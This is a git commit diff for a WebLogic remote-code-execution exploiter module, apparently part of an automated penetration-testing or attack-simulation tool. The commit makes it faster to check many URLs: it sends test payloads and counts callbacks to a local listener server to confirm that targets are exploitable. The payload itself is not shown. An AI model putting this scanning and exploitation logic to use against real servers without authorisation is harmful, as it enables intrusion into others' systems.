Improved the speed of weblogic exploiter

This commit is contained in:
VakarisZ 2019-01-24 17:28:44 +02:00
parent c38793b527
commit 6073e9f677
1 changed files with 31 additions and 5 deletions

View File

@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import threading import threading
import logging import logging
import time
__author__ = "VakarisZ" __author__ = "VakarisZ"
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
# How long server waits for get request in seconds # How long server waits for get request in seconds
SERVER_TIMEOUT = 4 SERVER_TIMEOUT = 4
# How long to wait for a request to go to vuln machine and then to our server from there. In seconds # How long should be wait after each request in seconds
REQUEST_DELAY = 0.0001
# How long to wait for a sign(request from host) that server is vulnerable. In seconds
REQUEST_TIMEOUT = 2 REQUEST_TIMEOUT = 2
# How long to wait for response in exploitation. In seconds # How long to wait for response in exploitation. In seconds
EXECUTION_TIMEOUT = 15 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
print(e) print(e)
return True return True
def check_if_exploitable(self, url): def add_vulnerable_urls(self, urls):
"""
Overrides parent method to use listener server
"""
# Server might get response faster than it starts listening to it, we need a lock # Server might get response faster than it starts listening to it, we need a lock
httpd, lock = self._start_http_server() httpd, lock = self._start_http_server()
exploitable = False
for url in urls:
if self.check_if_exploitable(url, httpd):
exploitable = True
break
if not exploitable and httpd.get_requests < 1:
# Wait for responses
time.sleep(REQUEST_TIMEOUT)
if httpd.get_requests > 0:
# Add all urls because we don't know which one is vulnerable
self.vulnerable_urls.extend(urls)
self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
else:
LOG.info("No vulnerable urls found, skipping.")
self._stop_http_server(httpd, lock)
def check_if_exploitable(self, url, httpd):
payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port) payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
try: try:
post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False) post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
except exceptions.ReadTimeout: except exceptions.ReadTimeout:
# Our request does not get response thus we get ReadTimeout error # Our request will not get response thus we get ReadTimeout error
pass pass
except Exception as e: except Exception as e:
LOG.error("Something went wrong: %s" % e) LOG.error("Something went wrong: %s" % e)
self._stop_http_server(httpd, lock)
return httpd.get_requests > 0 return httpd.get_requests > 0
def _start_http_server(self): def _start_http_server(self):